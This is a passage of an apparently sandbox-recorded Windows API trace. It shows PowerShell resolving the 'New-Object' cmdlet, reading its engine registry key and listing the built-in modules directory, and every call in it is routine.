ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.348] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.351] CoTaskMemAlloc (cb=0x20e) returned 0x25b739d9020 [0224.351] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b739d9020, nSize=0x105 | out: lpBuffer="") returned 0x97 [0224.352] CoTaskMemFree (pv=0x25b739d9020) [0224.352] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8df88 | out: phkResult=0x653ef8df88*=0x7f0) returned 0x0 [0224.352] RegQueryValueExW (in: hKey=0x7f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8dfd8, lpData=0x0, lpcbData=0x653ef8dfd0*=0x0 | out: lpType=0x653ef8dfd8*=0x1, lpData=0x0, lpcbData=0x653ef8dfd0*=0x56) returned 0x0 [0224.352] RegQueryValueExW (in: hKey=0x7f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8dfd8, lpData=0x25b5bdce9a0, lpcbData=0x653ef8dfd0*=0x56 | out: lpType=0x653ef8dfd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8dfd0*=0x56) returned 0x0 [0224.352] RegCloseKey (hKey=0x7f0) returned 0x0 [0224.353] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8db50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0224.353] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e080 | out: lpFileInformation=0x653ef8e080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.355] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0224.369] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8db50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0224.370] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e080 | out: lpFileInformation=0x653ef8e080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0224.370] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e080 | out: lpFileInformation=0x653ef8e080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0224.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8df40) returned 1 [0224.442] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0224.442] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.452] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.452] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0224.457] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0224.457] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0224.457] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0224.457] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0224.458] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0224.458] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0224.458] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0224.458] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0224.458] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0224.459] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0224.459] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0224.459] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0224.459] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0224.459] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0224.459] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0224.460] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0224.460] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0224.460] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0224.460] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0224.460] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0224.461] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0224.461] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0224.461] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0224.461] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0224.461] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0224.462] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0224.462] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0224.462] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0224.462] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0224.462] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0224.462] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0224.463] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0224.463] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0224.463] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, 